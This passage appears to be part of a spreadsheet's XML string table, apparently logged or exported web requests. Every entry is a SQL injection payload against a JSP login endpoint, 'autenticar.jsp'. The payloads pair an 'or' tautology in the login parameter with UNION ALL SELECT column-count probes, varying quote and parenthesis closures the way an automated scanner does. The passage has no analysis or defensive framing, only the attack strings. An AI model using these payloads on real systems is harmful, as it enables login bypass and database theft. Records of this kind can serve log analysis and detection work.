    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511,2511#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919#and(3771=3771</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875,4875#and(8218=8218</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534#and(3470=3470</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365#and(110=110</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994,6994#and(3808=3808</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237,237#and(7944=7944</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699,1699#and(1004=1004</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847,6847#and(8=8</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157,9157#and(1315=1315</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391,8391#and(929=929</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255#and((8286=8286</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541,4541#and((105=105</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957,5957#and((4080=4080</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252,6252#and((949=949</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315,4315#and((1651=1651</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481,7481#and((5720=5720</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946#and((8147=8147</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515,8515#and((8992=8992</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569,9569#and((653=653</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002#and((5168=5168</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772,2772#and(((7042=7042</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942,3942#and(((1508=1508</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294,7294#and(((9393=9393</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597,597#and(((0=0</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004,5004#and(((480=480</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520#and(((3964=3964</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362,8362#and(((248=248</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534,5534#and(((1325=1325</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676,676#and(((6076=6076</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926,2926#and(((14=14</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188,9188#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662,8662#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117,9117#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946,2946#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784,6784#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359,9359#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063,1063#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577,577#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365,1365#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775,7775#and('dogt'='dogt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695,6695#and('relh'='relh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227,2227#and('ugix'='ugix</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087,7087#and('uhuf'='uhuf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313,5313#and('ewze'='ewze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256,2256#and('hoia'='hoia</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912#and('akrl'='akrl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665,2665#and('eclb'='eclb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881,2881#and('ghsf'='ghsf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237,5237#and('hqzq'='hqzq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612#and(('qnch'='qnch</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428#and(('pint'='pint</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877,9877#and(('xrlb'='xrlb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590,6590#and(('zahp'='zahp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984#and(('zrgi'='zrgi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456,5456#and(('gnhw'='gnhw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334,4334#and(('ipog'='ipog</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100,3100#and(('aozw'='aozw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487#and(('cwzw'='cwzw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760,7760#and(('esyw'='esyw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262,5262#and((('lnzj'='lnzj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864,1864#and((('zotk'='zotk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746,3746#and((('xnks'='xnks</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604,4604#and((('jiad'='jiad</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100,9100#and((('bfrn'='bfrn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497,8497#and((('peit'='peit</t>
  </si>
  <si>
